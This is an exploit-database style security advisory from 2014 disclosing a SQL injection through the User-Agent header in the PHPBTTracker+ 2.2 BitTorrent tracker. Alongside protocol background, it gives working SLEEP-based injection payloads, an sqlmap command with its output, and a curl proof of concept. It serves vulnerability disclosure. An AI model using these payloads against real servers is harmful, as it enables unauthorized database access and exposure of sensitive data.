PHPBTTracker+ 2.2 SQL Injection

`# Exploit Title: PHPBTTracker+ 2.2 SQL Injection  
# Date: May 13th, 2014  
# Exploit Author: BackBox Team <[email protected]>  
# Vendor Homepage: http://phpbttrkplus.sourceforge.net/  
# Software Link: http://sourceforge.net/projects/phpbttrkplus/files/  
# Version: PHPBTTracker+ 2.2  
# Tested on: PHP 5.4.27, Apache 2.4.9, MySQL >= 5.0.0  
  
========================================================================  
  
Advisory: PHPBTTracker+ 2.2 SQL Injection  
Disclosure by: BackBox Team <[email protected]>  
Severity: High  
  
  
I. INTRODUCTION  
========================================================================  
  
SQL Injection through User-Agent.  
  
User agent is an HTTP header section provided by application used by the  
original client. This is used for statistical purposes and the protocol  
violation tracing. The first white space delimited word must include the  
product name with an optional slash and version number.  
  
User agent injection is a critical issue for web applications. In this  
specific case it’s worthed to do an investigation on the header section  
of user-agent to see if there is any malformation that will allow an SQLi.  
  
Example:  
GET /tracker.php  
User-Agent: Transmission/2.51' OR (SLEEP(20)) AND 'aaaa'='aaaa  
Host: [host]  
Accept: */*  
Accept-Encoding: gzip;q=1.0, deflate, identity  
  
  
II. BACKGROUND  
========================================================================  
BitTorrent tracker protocol is used by clients to request the IP  
addresses of other peers associated with a torrent, and to exchange the  
client's transfer statistics. Clients connect to a centralized server,  
known as a *tracker*, which stores their IP addresses and responds with  
the IP addresses of other clients (also known as *peers*). The tracker  
has no knowledge about the association of the nodes and their pieces  
(it functions only as bridge between clients).  
  
The standard tracker protocol is based on HTTP, with request data  
encoded as query parameters (as used by HTML forms) and response data  
BEncoded.  
  
Query parameters must be encoded according to the rules for HTML form  
submissions through HTTP GET: 'reserved character' bytes are encoded in  
hexadecimal as %HH, and space is encoded as "+"; names and values are  
joined with "=" and the pairs joined with "&".  
  
The tracker's URL announce is obtained from the announce entry of the  
root dictionary of the torrent metadata file.  
  
Clients announce themselves by sending a GET request to the tracker's  
URL announce with "?" and the following parameters (encoded as above)  
appended:  
  
info_hash  
The 20 byte sha1 hash of the bencoded form of the info value from  
the metainfo file. Note that this is a substring of the metainfo  
file. Don't forget to URL-encode this.  
  
peer_id  
A string of length 20 which the downloader uses as its id. Each  
downloader generates its own id at random at the start of a new  
download. Don't forget to URL-encode this.  
  
port  
Port number that the peer is listening on. Common behavior is for a  
downloader to try to listen on port 6881 and if that port is taken  
try 6882, then 6883, etc. and give up after 6889.  
  
uploaded  
Total amount uploaded so far, represented in base ten in ASCII.  
  
downloaded  
Total amount downloaded so far, represented in base ten in ASCII.  
  
left  
Number of bytes that a specific client still has to download,  
represented in base ten in ASCII. Note that this can't be computed  
from downloaded and the file length since the client might be  
resuming an earlier download, and there is a chance that some of  
the downloaded data failed an integrity check and had to be  
re-downloaded.  
  
event  
Optional key which maps to started, completed, or stopped (or empty,  
which is the same as not being present). If not present, this is one  
of the announcements done at regular intervals. An announcement  
using started is sent when a download first begins, and one using  
completed is sent when the download is complete. No completed is  
sent if the file was complete when started. Downloaders should send  
an announcement using 'stopped' when they cease downloading,  
if they can.  
  
Example:  
http://hostname/announce  
?info_hash=%ffq%de%ea%00a%bab%8cC%fb%fe%e6%00uX%c5%92%7d%d4  
&peer_id=  
&port=51413  
&uploaded=0  
&downloaded=0  
&left=0  
&event=started  
  
  
III. DESCRIPTION  
========================================================================  
  
In order to exploit the vulnerability the torrent has to be managed by  
the tracker. First we need to extract the GET request, and parse out the  
parameter "info_hash", a proxy or a traffic sniffer like Wireshark can  
help us to do that.  
  
Example:  
  
GET /phpbttrkplus-2.2/tracker.php/announce?info_hash=%ffq%de%ea%00a%bab%8cC%fb%fe%e6%00uX%c5%92%7d%d4&peer_id=&port=51413&uploaded=0&downloaded=0&left=0&event=started HTTP/1.1  
User-Agent: Transmission/2.51  
Host: hostname  
Accept: */*  
Accept-Encoding: gzip;q=1.0, deflate, identity  
  
Then it's possible to inject SQL commands inside the User-Agent field.  
  
  
IV. PROOF OF CONCEPT  
========================================================================  
Is it possible to verify the vulnerability by using, for example,  
sqlmap or curl...  
  
* Using SQLMap  
  
raffaele@backbox:~$ sqlmap -u "http://hostname/phpbttrkplus-2.2/tracker.php/announce?info_hash=%ffq%de%ea%00a%bab%8cC%fb%fe%e6%00uX%c5%92%7d%d4&peer_id=&port=51413&uploaded=0&downloaded=0&left=0&event=started" -o --level 3 -p user-agent  
  
[...]  
  
User-Agent parameter 'User-Agent' is vulnerable. Do you want to keep testing the others (if any)? [y/N]  
sqlmap identified the following injection points with a total of 318 HTTP(s) requests:  
---  
Place: User-Agent  
Parameter: User-Agent  
Type: boolean-based blind  
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)  
Payload: sqlmap/1.0-dev-0f581cc (http://sqlmap.org)" RLIKE (SELECT (CASE WHEN (6960=6960) THEN 0x73716c6d61702f312e302d6465762d306635383163632028687474703a2f2f73716c6d61702e6f726729 ELSE 0x28 END)) AND "mhBW"="mhBW  
---  
  
* Using curl  
  
raffaele@backbox:~$ curl "http://hostname/phpbttrkplus-2.2/tracker.php/announce?info_hash=%ffq%de%ea%00a%bab%8cC%fb%fe%e6%00uX%c5%92%7d%d4&peer_id=&port=51413&uploaded=0&downloaded=0&left=0&event=started" -A 'asd" OR (SLEEP(15)) AND "'  
  
[...]  
  
d8:intervali1800e12:min intervali300e5:peersld2:ip9:127.0.0.17:peer id20:4:porti51413eed2:ip9:127.0.0.17:peer id20:04:porti51413eee10:tracker id4:1131e  
  
  
V. BUSINESS IMPACT  
========================================================================  
An attacker could execute arbitrary SQL queries on the vulnerable  
system. This may compromise the integrity of database and/or expose  
sensitive information.  
  
  
VI. SYSTEMS AFFECTED  
========================================================================  
PHPBTTracker+ Version 2.2 is vulnerable (probably v2.x and  
RivetTracker v1.x too)  
  
Software Link: http://phpbttrkplus.sourceforge.net/  
Tested on: PHP 5.4.27, Apache 2.4.9, MySQL >= 5.0.0  
  
  
VII. REFERENCES  
========================================================================  
https://wiki.theory.org/BitTorrent_Tracker_Protocol  
http://resources.infosecinstitute.com/sql-injection-http-headers  
  
  
VIII. CREDITS  
========================================================================  
The vulnerability has been discovered by BackBox Linux Team  
http://www.backbox.org  
  
  
IX. VULNERABILITY HISTORY  
========================================================================  
May 13th, 2014: Vulnerability identification  
May ??th, 2014: Vendor notification  
May ??th, 2014: Vulnerability disclosure  
  
  
X. LEGAL NOTICES  
========================================================================  
The information contained within this advisory is supplied "as-is" with  
no warranties or guarantees of fitness of use or otherwise. We accept no  
responsibility for any damage caused by the use or misuse  
of this information.  
  
  
`